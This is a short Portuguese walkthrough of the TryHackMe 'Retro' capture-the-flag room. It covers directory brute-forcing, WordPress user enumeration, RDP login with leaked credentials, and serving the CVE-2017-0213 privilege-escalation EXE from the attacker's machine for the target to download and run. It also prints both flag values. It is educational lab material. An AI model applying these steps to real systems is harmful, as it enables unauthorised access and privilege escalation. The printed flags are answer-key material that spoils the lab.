Link da sala TryHackMe
Copie o ip da sua máquina tryhackme e acesse o navegador. Isso vai aparecer assim.
Você precisa executar este comando na ferramenta dirsearch
sudo dirsearch --full-url -w /usr/share/wordlists/Seclist/dirb/directory-list-2.3-medium.txt -u http://10.10.126.180/
Depois de executar este comando com sucesso, você encontrará um diretório oculto chamado retro
.
/retro
Como você pode ver, foi detectado WordPress CMS
Também encontramos a página de login de administrador padrão do WordPress.
Agora comece a verificar com a ferramenta wpscan para enumerar os usuários do site de destino.
wpscan --url http://10.10.126.180/retro -e u
Encontramos um usuário chamado wade
Encontramos credenciais na seção de postagem do blog. parzival
Logado com sucesso no painel do WordPress.
Agora use qualquer protocolo de área de trabalho remota para fazer login, estou usando o Remmina.
Após o login no PC remoto, encontrei um arquivo user.txt
na área de trabalho.
3b99fbdc6d430bfb51c72c651a261927
Agora clique no pequeno ícone search
no PC remoto com Windows e digite cmd
e pressione Enter
. Ele abrirá o prompt de comando. Agora digite este comando e veja as informações do sistema.
systeminfo
Agora vá para este link Explorar. E baixe o arquivo zip e extraia-o.
Abra o servidor python em sua máquina local onde você extraiu o arquivo CVE-2017-0213_x64
.
sudo python3 -m http.server --bind your.tun0.ip 8080
Isso irá gerar um link. Agora copie o link e acesse o navegador do PC remoto. Depois disso, baixe o arquivo EXE e certifique-se de mantê-lo para continuar o download.
Após a conclusão do download, clique para executar este programa. E digite o comando abaixo para obter o sinalizador root.
cd / cd Users/Administrator/Desktop type root.txt.txt
7958b569565d7bd88d10c6f22d1c4063